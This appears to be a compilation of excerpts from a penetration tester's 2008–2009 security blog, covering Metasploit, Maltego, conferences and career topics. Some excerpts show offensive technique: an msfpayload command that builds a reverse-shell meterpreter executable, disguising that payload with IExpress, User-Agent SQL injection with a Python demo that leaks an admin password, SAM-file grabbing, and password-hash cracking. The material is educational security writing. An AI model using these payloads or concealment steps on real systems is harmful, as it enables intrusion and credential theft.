This short tutorial is how to get Ruby 1.9.1 on BT4 or any other Linux distro with the tool ‘rvm’ (Ruby Version Manager).
The Metasploit team has put a lot of work into getting the framework to work well with 1.9.1 and still work with earlier versions.

If you haven’t seen it all over Twitter yet, achillean released the “beta” of SHODAN yesterday. It’s a search engine of basically an nmap of the internet (ports 21, 22, 23 or 80 so far).
http://shodan.surtri.com/
You can search by keyword, and/or using any of the advanced search options.
country: 2-letter country code
hostname: full or partial host name
net: IP range using CIDR notation (ex: 18.7.7.0/24)
port: 21, 22, 23 or 80
Here is just a taste of the power this brings to the game:

Idea came thanks to cktricky from: http://cktricky.blogspot.com/
A bunch of sites on the web give you different pages depending on the browser you use to view it. I know when I was a web developer compatibility was the bane of my existence, as I’m sure it still is for all the web devs out there. Well, sometimes this leads to bad coding practices, or even the old “Google Bot gets to see everything” feature.

We (the security community) all know, and make fun of, “Users” and “Admins”. They are derogatory terms in our community. So much so that they could almost be classified as curse words. (I can see the XKCD now: Security stick figure talking to IT stick figure. “You stupid A****“).
While I neither discount their “contribution” to making my day fun, I feel that a lot of people miss an even bigger threat: Policies and Procedures, or SOP (Standard Operating Procedures).

Disclaimer: I was given a demo license of the new free business product to break/review. No money has traded hands. This is my brutally honest opinion of the product.
I’ve played with a gamut of Astaro products, and personally I really hate UTMs, just like I do All-In-One Printer/Copier/Faxes. One thing breaks, they all do. However, Astaro’s .. before I go into my opinions of the product, or get on any soap box, here are the facts:

(This post got lost in the intertubes and it took a bit to get back, Archive.org nor Google cache had it)
I get this question all the time: “Why room362.com?” I have answered that question in a lot of ways, depending on the perceived amount of time I had to tell the story. But, on a blog you have tons of time, right? Not if you are studying the Twitter boom.

In Revision 7315 of the Metasploit Framework (SVN) a new option was added to MSFENCODE. Technically you always had the ability to do the following, but it required a bit of knowledge of the inner workings of the framework.
But before I get into the new feature, let’s quickly go over the standard way you use msfencode:
root@bt4:/pentest/exploits/framework3# ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.92.131 LPORT=443 R | ./msfencode -t exe -o /tmp/bob.exe
[*] x86/shikata_ga_nai succeeded with size 318 (iteration=1)
root@bt4:/pentest/exploits/framework3#
We just used MSFPAYLOAD to output, in [R]AW format, a reverse TCP connect meterpreter payload.

Continuing my “Getting your fill of” series
Dave Shackleford recently posted an excellent blog entry titled “One for the n00bs”: http://daveshackleford.com/?p=277
It relates the security community to a high school cafeteria. It’s a good read and pretty dead on. I want to echo his sentiments, “I got my OWN lunch table. And you’re invited.”, I’m just an email away. I also wanted to let you know there are a lot of places where you can learn on your own, at your own pace, and without any chance of ridicule.

I created a google group for the NoVA Hackers meetups (Formerly known as NoVASec Luncheons)
I have added some permissions to the group to maximize privacy options while still allowing for interaction other than me sending out BCC’d messages to everyone:
Private Invite Only - basically to keep spam out
Only Managers can view Member List - so those who don’t want their email addresses seen can join and just listen for announcements and regular message traffic

I had a bet with my friend about getting #1 on the Crazy Taxi high score page (== motivation for this post).
For those who have not been introduced to it yet, it’s a Facebook/Flash/2.0 resurrection of a much older game.
Not having extreme timing skills, I quickly gave up on getting the 2,000,000 points required to make it the “normal” way: My first try was modifying the outgoing HTTP traffic using the Tamper Data plugin for Firefox (to catch the obvious ones).

Yes, I just called everyone who works at Apple an Oompa Loompa, but I digress:
I was reading Brooke Crothers’ story on the Apple ‘gag’ order [1] and couldn’t help but think of how Apple has created an almost similar situation. Everyone wants to know what Apple is up to, can’t stop talking about it. Buzz Out Loud [2] even had people call and email asking them to see if they could do a show without mentioning Apple or the iPhone.

I’ve been debating making this kind of post for about a week, and I apologize for the RSS spam. But it was getting a bit repetitive telling people via DM, email or other communication what happened.
When I took my hiatus from Twitter, I zero’d out my followers, so, if you care to, please check to see if you are still following me. I will be watching my follows closely and will refollow people I might have missed in my initial run through.

CKTricky over at http://cktricky.blogspot.com has been running an awesome Burp Tip of the Day series on his blog. After seeing him use Nikto through Burp, I decided to see if I could just export the list of checks to a text file so that I could use them over and over in Intruder. After a bit of awk and sed hell I figured it out, and submitted it to him for acceptance to his BTotD series.

So this is a pretty crafty way of getting packet captures on a target system. Definitely could be streamlined with some meterpreter scripting fu, but awesome job on the video.
Metasploit meterpreter Windump/Winpcap sniffer from siles on Vimeo.

The site has been down for a while, there were a lot of factors that played into that, but mostly it was focus on some family, as I had some in town. I also came to the conclusion that it’s time to move to “the cloud” so I moved over to SquareSpace (using the coupon code: DEFCON </end shameless plug>). I have an actual web designer looking at hooking this thing up right.

Brute force, even though it’s gotten so fast, is still a long way away from cracking long complex passwords. That’s where word lists come in handy. It’s usually the cracker’s first go-to solution: slam a word list against the hash; if that doesn’t work, try rainbow tables (if they happen to have the tables for that specific hash type), and then the full-on brute force. Some would say those first two steps are reversed, and it really is the choice of the person doing it and the word lists they have to work with.

I recently upgraded my video card and had a rough time finding programs that fit the hype of GPU password cracking, so here is what I found so that you won’t have as hard a time.
Ivan Golubev’s SHA1/MD5/MD4 cracker: http://www.golubev.com/hashgpu.htm
Ivan Golubev’s RAR pass cracker:
http://www.golubev.com/rargpu.htm
CUDA Multiforcer (down at the time of this posting)
http://www.cryptohaze.com/bruteforcers.php
BarsWF - MD5 Cracker:
http://3.14.by/en/md5
GPU MD5 Crack: (Included in BackTrack 4 repos “gpu-md5-crack”)

Update I can’t say with 100% certainty that Nessus ever used NMAP as it’s base scanner, I was going off of memory. I apologize for not being perfect.
Update 2 Since people can’t seem to let it go, I would say that I was totally wrong and that nmap was absolutely never used in Nessus ever, but then I would be caught in another absolute that I can’t confirm. According to their wiki, the nmap NASL scripts were taken out because people were
No, I haven’t listened to the latest episode of Securabit in which Paul comes on and talks about Nessus.

Per the best of the best in presenting, what breeds a good presentation slide deck? Simplicity
I want to pose a statement: “Simplicity is Security”. The reason I say this is that in this day and age, at least in the US, ‘convenience’ is king. And we try to protect those conveniences with ‘security’. Let me start over a bit; this train of thought all started when I began to explain the insecurities in WiMAX to my wife.

I recently visited Tokyo, Japan. Just as always, my curiosity got the best of me and I started to calculate the population density of the buildings where I was staying. Giving a fudge factor for non-populated apartments, I estimated 8,500 families in twelve 15-story buildings, living in a 1.5 mile square piece of land. That’s CRAZY. Mass transit and unrestricted modes of transit are not a whim, they are a requirement. I bet you’re asking how this applies to security, or for that matter computers at all.

When I was in middle school, I told a lie. I was so good at telling lies, and remembering even the infinite details of these lies that I could make them believable. Later in life, I learned that this skill was called “Social Engineering ;-)”, but back to the story; I told everyone that I had won a shopping spree at “Incredible Universe”, now named “Fry’s”. Even the teacher believed me.

Let me preempt this post with the following facts: I am a white male veteran with amazing parents. I went to a good school, and was never under-valued by the people I cared about. I fit no minority profiles in other words. I tell you this so that you can latch on to it as why I don’t understand anything in your rebuttal. But I think this gives me a unique view on the issue.

Looking for local events?
I’ve gotten a lot of people asking me recently where the local events are in DC, and I almost every time turn them to the awesome http://www.novainfosecportal.com/ which is hands down the best source for local events for the DC-NoVA-MD area, not just NoVA.
Grecs (follow him on twitter) does an amazing job at keeping it up to date and filled with every event possible. (Subscribe to his google calendar of events, get the RSS feed.

Well, sorta…
I created a meterpreter script that takes the cygwin bundled version of Metasploit inside of a NullSoft installer that HD Moore created and deploys it using meterpreter to the compromised host, extracts/installs it, and runs the shell. Now I left this intentionally open so that you could package your own cygwin bundle (possibly with nmap and netcat), for your own evil fun.
Thanks definitely go to Carlos Perez (Dark0perator) and HD Moore for their help getting this bad boy working right.

There are a lot of tools that I find in my endeavors would be really helpful, but can’t find on the net for whatever reason.
A portable version of tshark that has ARP spoofing capabilities. I want to be able to drop the file, issue the arguments and pull the pcap back.
An application that can sniff traffic from a specific process. Metasploit’s keylogger is sort of there, as it only pulls keys from the process to which it is attached (the DLL is at ‘fault’ for this).

Val Smith recently wrote a post on the new Attack Research / carnal0wnage blog titled:
“Security Conferences, pen tests and incident response”
Here are my thoughts on what he wrote:
In paragraphs 2-6 he talks about two points. The first being that Hacker Conferences have become sort of commercialized with most speakers going for their day in the lime light or to pimp some product/0day. And the second being a lot of the talks are things that most can’t go home / back to work and test out or implement.

I posted this walkthrough to the Metasploit mailing list, but thought that it would serve well here as well. Especially with the recent iPhone 3.0 “Special” download spam I recently received. The binary comes out to a whopping 97 bytes for the stager. It would be a blazing fast download and, coupled with the IExpress “hack”, would make for a very hard to spot payload.
A really down and dirty explanation of what PassiveX is and why it’s useful in this sort of situation: instead of making a direct connection back to you, it uses an iexplore process with a cool ActiveX control to talk back.

I recently posted a blog post to Exotic Liability’s website with the same title, and I realized that it would make a great thing to post to here, and update regularly, or just put it on the wiki I keep saying that I get going here. Enough rambling, here is how you can get your fill of security:
Podcasting: GetMon - http://www.getmon.com/ - This is a great site because you can download or listen to any of the security podcasts right from their site if you want to.

First of all, here is my slide deck from DojoSec with a couple added slides, words, and slight modifications:
From Couch To Career In 80 Hours from Rob Fuller
I have put this article off quite a few times due to some very cool and interesting things happening in our field as it applies to getting a job. That, and Matt Johansen beat me to it with his blog post titled: “A lot of Information Security Career Advice”, which I highly recommend you check out and add to your RSS reader.

Dark0perator and I will be giving a workshop at ToorCamp coming up July 2nd-5th:
You can find us on the ToorCamp site: http://www.toorcamp.org/content/W13
Here is the description of our talk, save the bio(s):
The Art of Pivot and Persistence: Shell is only the beginning.
This workshop is based on the assumption that you have some level of access on a target system. From that it is demonstrated how to go from that level of access to taking over the whole company and how to keep that access, surviving reboots, AV scans, and even reimaging.

I highly recommend both of these courses, and the chance to get in front of the instructors and ask questions live is worth it IMHO. So bang on those manager doors and work it out, because seats fill quickly and they are limited. **Check out the [Offensive Security - Instructor Lead Training](http://www.offensive-security.com/ilt.php) page for updated information.**
We are excited to announce our next Offsec Live Classes. Since you asked to be notified of our next dates you will be happy to be among the first to have your teams invited to one of our next classes.

Now, before you get all huffy about the title, it’s not what you think. Keep reading:
It’s been 20 days since I received my Kindle 2 (word of warning, NEVER use USPS. Spend the money; it’s not worth the stress). But enough lollygagging, let me get straight to it:
Advertised Features: Email DOC, HTML/HTM, JPEG/JPG, GIF, PNG, BMP (Also, everything can be put in a ZIP for one time sending).

Last Friday (March 6th, 2009) I posed the question above. What I got in return was nothing short of amazing, and to tell you the truth, it amazed me how the tally rounded out. I categorized the answers and counted them up (MANAGERS, listen up!):
(12 votes) - Security Fundamentals: This category involves the application of A/V, IDS/IPS, basic safe surfing techniques, least privilege use, and an understanding of phishing.

First I wanted to say, sorry for this and the last installment of Room362 being non-technical. They are topics that I feel strongly about and so felt impelled to share. One of the biggest problems in the world, IMHO, are people who have unfounded hate. This is compounded by the anonymity of the Internet, allowing that hate to have no repercussion or identity. Let me also say I have a deep respect for Free Speech, the depths of which I fear few truly know.

My recent post “OzymanDNS - Tunneling SSH over DNS” caused a good friend, and someone I highly respect in the information security field, Dave Hull from Trusted Signal, to call me out on the ethics of the post.
Instead of lying to you, Dave, and to myself, I did not put any thought into the ethics of the post until Dave brought it up. Well, except for that auto subconscious RIGHT/WRONG check.

Hak5 Episode 504 Shownotes (In the episode I say that it’s cross platform, use the release links for the Windows binaries to get it working on windows or use cygwin)
DISCLAIMER - I IN NO WAY ENDORSE ILLEGAL ACTIVITIES - USE THE FOLLOWING GUIDE IN A TEST ENVIRONMENT OR AT YOUR OWN LEGAL RISK.
UPDATE: Thanks to Chris Gates and Robin Wood for pointing me towards a fixed up version of OzymanDNS and a great tutorial: HERE

Update to post: Metasploit Heart’s Microsoft
Ok, so many people had issues with the Vimeo video, that I posted it to youtube in hopes that you’ll be able to play it all the way through. I still have no idea what the issue is, it’s played perfectly on all the computers that I’ve tried it on.

Recently I have been debating on whether to get a Netbook or the Kindle 2. (I am only in this debate because my lovely wife decided to buy a table and chairs, for the house. There is no winning when they buy things for ‘the house’ or ‘the kids’).
Anyways, I tweeted up my dilemma and got a huge amount of responses. They came from both sides of the fence. Some said Kindle and some said Netbook, and they all had good arguments.

Most of you Twitterholics have seen this beautiful status. You get a total of 100 API calls per Twitter account per hour. What happens if you use all of your afforded calls? You can just use http://www.twitter.com/, no problem, right? Well, you lose a lot of what makes Twitter clients so useful (search, grouping, instant updates.. etc).
Well, what if you leave your client up at home? TweetDeck by itself uses most of the API calls.

Hiding Meterpreter with IExpress from mubix on Vimeo.
Using IExpress, a built-in tool (XP, not sure about other Windows versions), we package two executables together, so that the target is less likely to suspect foul play. Now, I used calc.exe, but you can use anything on both sides of the coin. Use a better game so that it’s easier to dupe, or a different malicious executable (leekspin perhaps?

Official Press Release: February 24th, 2009. Kansas City, MO - The Cowtown Computer Congress (CCCKC) is happy to announce the opening of their Underground Lab to the public with a full week of events. Beginning on March 2nd, the grand opening showcases the rich and vibrant community of creative minds in the Kansas City area. CCCKC, the first organization of its kind in the midwest, will serve the community by providing technology classes, donating unique projects to local organizations and technology assistance to those in need.

(This is the 3rd time I am writing this post, FF Fail, then Word crashed, so please excuse the lack of passion)
The moment that PDANet published that they released an updated version that allows USB tethering, I ran home and “QuickPWNd” my phone (which took all 5 minutes). Loaded the app and now I had the coveted TETHERING. I was free of my bind to Comcast or Free Public Wifi.

Let me start off this post by saying that the main focus of any of these competitions is not to win, but to learn. Learning is usually accompanied by tears on the defenders side, but the best way to learn is to fail.
That said though, the title of this post is about how to win:
Planning Phase: This is where you win or lose. If you don’t have a good plan and a good team layout ahead of time, you are screwed.

So here is the deal. I have a ticket to the RSA Conference that is April 20-24 in San Francisco, at Moscone Center. I can’t use it. So I am offering it up as a bribe. Here is the bribe. I need a video of The Middler in action. From start (downloading) to finish (compromise / root / BeEF / owange) of another machine.
The video must be without audio, pausing a bit with each step, and a maximum of 1020 x 720 in resolution preferably in Camtasia Studio format.

It figures that someone who didn’t go actually made a list of tools. (Probably because they didn’t have to suffer the ShmooFlu)
Check out: http://blog.security4all.be/2009/02/shmoocon-2009-overview-collection-of.html Thanks to Security4all for posting it up!
If you see something that he doesn’t have, pictures, videos, links, or tools, please let him know.
FireTalks / PodCasters Meetup audio can be found here soon: http://pcm.libsyn.com/

Metasploit is awesome, but some don’t know that there are updates all the time via SVN, and even fewer know of places to get good non-SVN modules / scripts. Here are a few of my favorites:
https://www.securinfos.info/metasploit/msfxdc.php
http://metasploit.com/users/mc/
http://darkoperator.blogspot.com
– newly added, check out the CookieMonster script and a host of others:
http://pentest.cryptocity.net
And of course: http://carnal0wnage.blogspot.com/

I have had the idea for this app for a long time, expressed it a few times, but never really pushed, and I am sure that I am not the only one who has thought of or wanted an app like Ear Trumpet by Robin Wood. Well, on Jan 21st Sam Buhlig posted to the PaulDotCom mailing list asking for an app to test a firewall that would answer on all ports.

I registered Bobstories.com after listening to PaulDotCom for a while. I have always told stories of this manner, but never quite put a name to “my friend”. Now that he has a name, it is only fitting that he has a domain and a blog. Please, come, register under the name bob_#### with a mailinator address to match, or your own name and email address if you wish. I’ll moderate all posts simply for spam purposes and have them up posthaste.

I recently obtained the status Offensive Security Certified Professional. It is one of the best courses I have ever taken. It challenged me to think and learn new skills on the fly. You start the course with a bunch of video files, a huge pdf and an lzm file to get your VPN setup. It is self paced and intense. The topics cover everything from Back|Track basics to the HXDEF rootkit.

First: Using SAMBA to crack Unix passwords
Theory: You compromise a Unix host during a pentest and grab /etc/shadow and /etc/passwd. You take the entries for root in both and drop them into a Unix host that you control that is set up with SAMBA to sync authentication. You then use Windows methods to extract the LM/NTLM hash from SAMBA.
Problem: SAMBA doesn’t cache the LM/NTLM hash until the correct one is passed to it.

The Full Disclosure mailing list has a long and illustrious past. It has played host to everything from zero days to politics. One thing that has rung true for a number of years, if not since its inception, is that it is unregulated (save spam of course). However, in recent months it has fallen prey to fewer and fewer technical discussions, and more bickering, name calling, and outright trolling.
The reason for this post is to let everyone who has unsubscribed know that a change is coming.

TiVo and DVRs in general have brought TV watching a long way. Some of the innovations that have come of it have made the TV experience better. Commercial skipping is my own personal favorite. But some of the other features are pausing, rewinding, and fast forwarding (after you are behind a bit, obviously) and finally recording. Now, recording live TV is nothing new. People have done it since VCRs were invented, and I’m sure long before then.

More information can be found at http://www.podcastersmeetup.com/
But here is the down and dirty: We are sponsored this year by: HP, SunbeltSoftware, DojoSec, and TheAcademyPro / TheAcademyHome solidly so far.
The following podcasts will be making an appearance:
Hak5
PaulDotCom
CyberSpeak
Securabit
SploitCast
Unpersons
Phone Losers of America
SMBMinute
And the schedule goes as such:
1700 - 1800 - Meet and greet, and setup (Everyone involved in the live event please show up as close to this start time as possible)
1800 - 1900 - Live Show (This will probably go over time)
1900 - 1930 - Book signing and transition time
1930 - 2030 - FireTalks (more below)
2030 - 0400 - Food and Drinks on us at local spot.

Sponsors: We have had a lot of great response for everyone on this year’s event! I want to reiterate, this event is for podcasters, bloggers, twitter addicts, and everyone in between. I would also like to announce an update to our sponsor’s lineup:
TheAcademyPro.com / TheAcademyHome.com > These are twin sites catering videos to the security pro looking to learn about everything from enterprise gear to Maltego, and the home user trying to start the learning about security and how to secure their own computers without going to you the IT guy in the family.

Table of Contents:
Part 1 - Introduction
Part 2 - Entities and Transforms
Part 3 - The Human Factor
Part 4 - Server Time (CTAS, PTTAS, MALTAS, SQLTAS, SNTAS)
Part 5 - Hacks, Tips, and Tricks
Today we are taking a brief step outside of Maltego and at the end we’ll show how you can use what you have learned to take Maltego to another level. So, without further ado:

SQLi through meta refreshes using cookies or user agents. Making SQLi a client-side attack. How much do you want to bet that the person that visits the site the most is the administrator :)
JavaScript adding hidden file upload form fields that are auto populated with C:\Windows\System32\config\SAM or C:\Windows\Repair .. yadada. You get the idea.
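The server-side sink that the first idea depends on, as an added example that is not from the original post: a site that logs every visitor’s User-Agent into a table the administrator later views, with the query built by string interpolation beside the same logging done with bound parameters. The table layout, the admin row and the payload header are constructed for this example; a real site would have its own schema and its own log page.

```python
import sqlite3

# Everything below is constructed for this example: the table layout,
# the admin row and the User-Agent payload are assumptions, not from the post.
ADMIN_PASSWORD = "hunter2"
# A User-Agent header value that closes the string, substitutes a scalar
# subquery for the second column, and comments out the rest of the query.
PAYLOAD_UA = "x', (SELECT password FROM admins LIMIT 1))--"


def new_db():
    """In-memory stand-in for the site's database."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE admins (user TEXT, password TEXT)")
    con.execute("INSERT INTO admins VALUES ('admin', ?)", (ADMIN_PASSWORD,))
    con.execute("CREATE TABLE visits (ua TEXT, path TEXT)")
    return con


def log_visit_vulnerable(con, ua, path):
    """Builds the INSERT by interpolation: the header is treated as SQL."""
    con.execute(f"INSERT INTO visits (ua, path) VALUES ('{ua}', '{path}')")


def log_visit_safe(con, ua, path):
    """Same logging with bound parameters: the header is only ever data."""
    con.execute("INSERT INTO visits (ua, path) VALUES (?, ?)", (ua, path))


def visitor_log(con):
    """What a 'recent visitors' admin page would render from the table."""
    return con.execute("SELECT ua, path FROM visits").fetchall()


def record_and_read(logger):
    """Log one request carrying the payload header, then read the log back."""
    con = new_db()
    logger(con, PAYLOAD_UA, "/index.html")
    return visitor_log(con)


if __name__ == "__main__":
    # Vulnerable: the 'path' column of the log now holds the admin password,
    # so whoever opens the visitor log (the administrator) reads it out.
    print(record_and_read(log_visit_vulnerable))
    # Safe: the payload is stored verbatim as an odd-looking User-Agent.
    print(record_and_read(log_visit_safe))
```

The attacker never needs to see the site’s response: the subquery result is written into the log row, and the administrator’s own browsing of the log page is what exposes it, which is the “client-side” flavor the post is pointing at. The parameterized version stores exactly what the client sent, quotes and all.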

Today I was in a brief / talk / meeting and I just wanted to share with you some of the things that I saw in this event that might better help you know what NOT to do while getting up in front of any size crowd.
Death by bullets (Yes, this is bulleted to be ironic). But seriously, this was a recurring theme throughout the meeting. Try and keep it to 3 or 5.

I believe there is a fear in the security community about speaking. Most don’t believe they either have something important enough to say, or have some awesome ‘thing’ and are just too afraid of the stage. Here are some resources and videos that have helped me gain the confidence to speak.
Gary Vaynerchuk @ Web 2.0 Expo: [http://www.youtube.com/watch?v=EhqZ0RU95d4](http://www.youtube.com/watch?v=EhqZ0RU95d4)
– Specifically look at how he speaks. How he starts, how he finishes.

This is an untested theory, but I don’t see why it wouldn’t work. Anyone who wants to prove it either way is very welcome to comment on the matter below.
Ok. Say you have the following excerpt from an /etc/shadow file:
root:awac7eQv2CT0g:12685:0:10000::::
billybob:$7$b1XHzqR5$RJxOyHRAix2rVmtXyHkLikmnod.z94P6vSL1h8ZeUdY/urvOvkvJjg2hn/J0r90YAdAA8HedGIPR2D7.zIzJS0:14438:0:99999:7:::
Both passwords in clear text are “uncrackable”. Here is where the trick comes into it. We use the weakness in LM hashes to crack the password (as long as it’s under 15 characters of course).

Alright, you all have heard of some of the annoying items that make ThinkGeek a one stop shop for cube warfare, such as the Annoy-a-tron and the Phantom Keystroker. Well, nothing can hold a candle to the BSODomizer. Along the lines of the Annoy-a-tron and the Phantom Keystroker, this device is hardware and messes with your target on a timer based method. But what gets added to the mix is the fact that it has an IR receiver as well, so while you are giggling in your cube trying not to bust up laughing, you can actually use any Universal Remote set to the Sony TV code, a TV-B-Gone (Mitch Altman’s awesome invention), or even a computer that is set to send that signal from its IR port.

Yesterday on Twitter I posed 3 questions:
Question 1: Now that Clickjacking has faded away from “Newest Greatest BAD STUFF”, how many implemented NoScript personally? What about Enterprise wide?
Question 2: Now, everyone who responded that you are still at IE in the enterprise. Why? Did you show the powers that be clickjacking and its effects?
Question 3: Ok, here is the final question of the trio. Why, since we rely on IE, aren’t we screaming at M$ to implement NoScript-like features?

It’s official: Burp Suite 1.2 is officially released to the masses. It includes a whole host of new features. Mainly (the ones spoken of in the blog post about the release):
Site map showing information accumulated about target applications in tree and table form
Suite-level target scope configuration, driving numerous individual tool actions
Display filters on site map and Proxy request history
Suite-wide search function
Support for invisible proxying

It’s not quite the snooze button I asked for, but it will do. Google implemented Gmail Tasks inside of Gmail Labs. Here is the blog post about it: http://gmailblog.blogspot.com/2008/12/new-in-labs-tasks.html

If you haven’t seen it yet, I posted about a Nerv-Labs Live DVD that included all kinds of security distros in one bootable DVD, which was also featured in Episode 0x415 of Hak5. Well, there were some things that it was kinda lacking, mainly Helix and Samurai.
Well, my buddy Marcus Carey from SunTzu Data did it up right. Let me introduce SumoLinux. SumoLinux has the following linux distributions on it:

Guest Article By: Ryan Pfleghaar (post_break) of iamthekiller.net
DEFENDING AGAINST JASAGER
Jasager has been making people question wireless security since episode one of season four on Hak5. The number one question besides “How do I get this to work” is ”How do I protect myself?”. This exploit in wireless security has been somewhat of a challenge to protect against and with this article I am going to detail how Mubix and I came up with a quick and easy fix.

I have had this rant on Twitter (if they had threading I would link to it). I have also had it in person a half dozen times at CSI Annual. And a piece of the puzzle was touched on by Jack Daniel on his blog posting “The Fallacy of Penetration Testing”. We as “Security Professionals” have a big problem. We usually don’t have the power to make change.

This is just a quick blurb because Tom from the Security Justice Podcast already has a great post about all the changes:
Check out his post here: http://spylogic.net/item/382
New link: http://www.spylogic.net/2008/12/maltego-201-released/

Gary Vaynerchuk of Wine Library TV made a post about Ego Searching. He describes in this short video that ego searching when you are trying to make a brand is simply caring about your audience:
Now even Leo Laporte, while being interviewed on the Geek Cred podcast said that as a broadcaster (which can be translated into “Content Producer”), your audience is the most important thing and your responsibility is to them.

Unless you have been hiding under a rock, or just started reading this blog today, you have heard about GoPC. I featured it in my USB Goodies 2008 and I love their product. Now they have entered into a “Strategic Alliance” with a company called ThinLinX. Now, the details of this alliance and the future it holds aren’t clear at the moment. And of course I have my own speculations.

I use gmail. Not really a big admission nor very hard to find out. But the reason I use it is because of its threading and archiving. For me those two abilities are unmatched anywhere else; both Outlook and Thunderbird fail horribly at this.
More to the point, I have reached a certain level of ‘zen’ with my GTD methods on gmail. I am in a constant battle for “Inbox Zero” and find “Starring” extremely useless for me.

Alan posted this about the SBN:
Well, there is not much sense keeping it a secret any longer, as others have already blogged on it. The Security Bloggers Network is going Lijit. Working with the folks who bring you Lijit search widgets, the Security Bloggers Network has a new home. You can find the site at http://www.securitybloggers.net (thanks to Tyler Reguly of http://www.computerdefense.org) and at http://www.securitybloggersnetwork.com (this may still be resolving).

Update - Shmoocon already had a list: http://lists.shmoo.com/mailman/listinfo/shmoocon-roommates
Go with what your readers want right? Well I have recently been getting a lot of hits on finding room sharing at ShmooCon. I have done this before at cons and I have met some very interesting people. So I created the google group ShmooCon RoomShare. Post that you are looking, post that you have space. It’s all voluntary and you can sign up for email alerts so that you don’t have to check it all the time.

Even if you have been to ShmooCon, something that eludes most con-goers is the Hack or Halo contest. Most of the time you will see its organizers at a table near the registration desk getting people signed up. What you may not know is how the whole thing goes down. It’s after hours so you aren’t missing the great content during the day, and it might save you a few dollars of bar time.

Many of you know who operat0r is, Darren in particular since operat0r pulled a magic trick on Darren’s ACER ONE (Archive.org Links) that turned it from brick to badass in less than 5 minutes. But what some of you may not know is that ol’ McCurdy (operat0r) has some other awesome side projects that run the same course as my style of apps. PORTABLE. But these aren’t the standard portable apps that I find on the net.

Ok, it’s not to you, but it is to a good cause. Here is their blurb:
Hackers for Charity helps non-malicious hackers gain valuable job experience by putting them to work on projects for charity. They also build computer classrooms to help children and adults break the cycle of poverty through empowerment training, and feed children with funds raised by sales of Johnny Long’s books.
This month, I thought that it would be fun to partner up with Hackers for Charity in order to raise money for the people of Uganda.

So I have graduated from the black and green standard hacker theme (with forest header) to a much easier to read and iPhone friendly theme. I have also added a few things to the site. Probably the most noticeable is the new logo. The logo was created by my good friend TestMAD. He is a starving graphic artist that runs the IRC network ThinStack. He also supports a number of other projects like Geekcred, and Wess Tobler’s new project, Unpersons.

Haven’t had enough conferences yet? First, thanks to everyone who entered through email, twitter and commenting on the CSI give away. Second we do have a winner so please stop the flood. But, on to the show.
The SC World Congress, Dec. 9-10, 2008, at the Javits Convention Center in New York is offering a discount code to all readers of SBN (Security Blogger’s Network). But what is “The SC World Congress”? Here is what they say:

What is CSI? This is what CSI says about it:
Security is in transition. There is general agreement that security does not work, but not on how to fix it. CSI 2008 is the only event today that faces the challenge to reconsider security. This year at CSI’s annual event, the most innovative minds in security will grapple with the tough questions, providing a reality-check and alternative to cookie-cutter conferences that merely tweak the status quo.

Hi, and welcome to my trap. I see a ton of searches of just your type on my site on a daily basis. Lets get down to ranting.
Maltego is an awesome tool, it’s also GIVEN AWAY for FREE.. As in beer, which they allow you to use their servers to do your stupid little ego searches on. **STOP TRYING TO STEAL IT.**
Offensive Security 101. This is by far the best course / certification that I have attempted thus far in my career.

Recently there has been a lot of people in my scope that have been wondering about what “hacker” or security related podcasts are out there. iTunes does a horrible job at categorizing anything past “Technology”. That is where Hacker Media.org comes in. Not only can you get the main feed of ALL the hacker/security related podcasts out there, you can get even deeper. Droops, the maintainer of said monster, makes it so you can pick and choose what kind of shows you want to see by having individualized feeds based on categories, and as shows come and go from those categories the feed changes with it.

EDIT: Switching something from “DRAFT” to “PUBLISH” is a really important step. Sorry guys.
Let me preface all of these tools with, the fact that some don’t come “portable”. To make them so, I have dropped the installer / setup file into Universal Extractor and then cleaned up the directory.
PortSwigger’s Burp Suite - http://portswigger.net/suite/
This tool is essential to any web application security guru’s tool belt. If you haven’t used it already it is time to get schooled up on this wrecking ball.

So there I was…
Today I was sitting at home watching Irongeek’s post of John Strand’s talk Defense In Depth is Dead, Long Live Defense In Depth. And I had one really evil thought:
Someone (such as Bob) could sit at an airport. We all do this; it isn’t difficult. He could then turn on his laptop and connect it to the airport wireless. Another task, difficult for some, but let’s go with Bob being able to.

I got an overwhelming response to me stopping the social engineering challenges, which far outshadows the large response I got against the challenges. In other words, the “AYE”s have it. As soon as my Maltego series comes to a close I will be starting the challenges back up again. Thank you for your support and I look forward to the continuation of the challenges; I really had fun with the first one.

If you haven’t heard already about Jasager.. well you probably don’t read this blog, but for those who want to know a bit more about the history of Jasager - Karma on the Fon, where the project is now, and where it’s headed, then buckle up, and hang on while we first travel down memory lane.
History:
The time was ShmooCon 2006. It was my very first “HACKER” convention. I was there with my buddies from Hak5 and SploitCast.

Well, it’s not the only answer but I will call them that because it’s what worked for me:
Sitting a couple rows down from the line so that no one would see me from the bus line I was targeting, I waited for the bus to come. As soon as it came rolling up, I quickly moved into a dash for the door, timing it so that I could cut in line to be the 4th on.

Here is the scenario:
There is a line of government and commercial workers that are in line for the bus. The bus is late, and everyone has had a long day of work. Your target is the first person in line. The line is 75 people long for a bus with a max occupancy of 35 people. Your target is the same sex as you and has headphones in their ears.

So there are all kinds of links that I find and queue up to look at but hate keeping them open in tabs, and they aren’t always in Google Reader and I don’t want to spam to twitter, so Mubix’s Links was born. I setup ScribeFire with a new blogspot account and now, no more tabs; it truly feels like an application of GTD. Plus it allows anyone who is interested to follow along via the blogspot feed.

Now that you have had some time to play around with Community Edition or, if you were lucky (or rich) enough, the Full version, we are going to start delving into the pieces of Maltego and then in Part 5 we rip it apart and put it back together for PT-TAS (Penetration Testing - Transform Application Server). I am going to say “investigation” a lot in the coming paragraphs and parts of this article.

Due to a PEBKAC error with the ID 10 T, I have had to retype parts 2 and 3, which were ready to go out the door.
In the mean time while I fix myself, here are a couple sites that can keep you busy:
Search google for exploits:
http://www.exploitsearch.com/
Watch just about any TV show (and some movies) online:
http://www.surfthechannel.com/
Play any NES game online:

So we are taking a short break from my 4 part series on Maltego to bring you a guest post on runtime packers done by your friendly neighborhood Security Shoggoth. Packers are one of those mystical tech items out there that for most people sound too complicated to even look into. What SecShoggoth and I aimed for with this post is to have it understandable yet technical, and I think he did an awesome job:

First lets outline whats to come:
Table of Contents: Part 1 - Introduction
Part 2 - Entities and Transforms
Part 3 - The Human Factor
Part 4 - Server Time (CTAS, PTTAS, MALTAS, SQLTAS, SNTAS)
Part 5 - Hacks, Tips, and Tricks
**EDIT:** This and the following posts are also show notes for the Season 4 premiere of Hak5
So Maltego 2 has been released and all I have to show for it are these images stolen from paterva.

So, instead of doing this the right way, which is submitting a bug report to google, I am going to do this the blogger way:
